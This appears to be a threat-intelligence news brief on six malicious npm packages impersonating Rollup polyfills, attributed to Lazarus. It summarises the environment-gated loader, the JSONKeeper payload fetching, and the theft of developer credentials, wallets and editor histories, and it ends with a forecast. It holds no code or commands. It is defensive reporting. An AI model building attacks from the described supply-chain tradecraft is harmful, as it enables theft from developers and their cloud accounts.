
JFrog Traces Six npm Packages to Lazarus Using Rollup Polyfill Impersonation and OtterCookie Loader
North Korean actors published six npm packages that impersonated Rollup polyfills to install a gated loader fetching remote payloads for credential theft and remote control. The operation matches prior Lazarus campaigns documented by JFrog, Panther, and SafeDep in both technique and targeting of developer environments. The incident highlights sustained state focus on build-tool ecosystems over headline-grabbing ransomware.
The packages "rollup-packages-polyfill-core" and "rollup-runtime-polyfill-core" plus four others replicated legitimate metadata and dependency names before installing second-stage SVG utilities that pulled JavaScript from JSONKeeper. Execution required passing checks against cloud, serverless, and analysis environments, after which the decrypted loader enabled terminal access, screenshot capture, browser and wallet data theft, and clipboard monitoring via @nut-tree-fork/nut-js. File collection specifically targeted VS Code, Windsurf, Cursor histories and keys for AWS, Azure, Claude, and SSH. JFrog documented the campaign alongside prior April 2026 reporting from Panther on 108 packages delivering BeaverTail and OtterCookie, and SafeDep analysis of express-session-js using the same remote-control library. The layered name-space collision and hidden install scripts match documented Lazarus supply-chain tradecraft rather than typical ransomware or commodity malware. The attack surface centers on developer workstations and CI pipelines that routinely load Rollup plugins, granting direct access to source, tokens, and cloud credentials. Official attribution relies on malware family overlap and infrastructure reuse; independent confirmation rests on the consistent use of JSONKeeper exfiltration and environment gating seen across multiple vendor reports. Registry takedowns have occurred but the underlying pattern of repeated targeting of build tooling persists. Expect similar campaigns against other bundlers and AI coding assistants within the next quarter as the same actor maintains pressure on developer supply chains.
Lazarus Group: At least one new malicious npm campaign targeting bundler or AI tooling will surface within 90 days.
Sources (3)
- [1]Primary Source(https://jfrog.com/blog/north-korea-npm-rollup-campaign)
- [2]Supporting Source(https://panther.security/npm-lazarus-april-2026)
- [3]Supporting Source(https://safedep.io/express-session-js-analysis)